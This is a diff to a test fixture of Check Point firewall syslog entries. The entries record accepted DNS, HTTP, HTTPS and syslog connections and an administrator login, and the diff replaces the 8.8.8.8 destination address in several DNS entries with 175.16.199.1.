 <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52372"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d9d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52373"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:22:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812da5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524133"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:22:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812daf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524143"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45770"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:22:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812da5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524133"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:22:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812daf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524143"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45770"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:22:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:22:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59248"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10870"; xlatesrc:"0.0.0.0"]
@@ -7010,7 +7010,7 @@
 <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61286"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10874"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60198"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41206"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10875"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:22:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812db9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524153"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38693"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:22:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812db9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524153"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38693"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:22:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812dbe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50174"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:22:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812dbe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43324"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10876"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:22:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e812dc3,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; additional_info:"Authentication method: Local bind"; administrator:"localhost"; client_ip:"127.0.0.1"; machine:"gw-da58d3"; operation:"Log In"; operation_number:"10"; product:"query-database"; subject:"Administrator Login"]
@@ -7074,21 +7074,21 @@
 <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41330"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10893"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49477"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61414"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10894"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:26:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:26:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:26:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e96,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e98,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:26:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e9f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524383"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:26:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ea9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524393"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:26:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524403"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:26:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ebd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ec7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524423"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
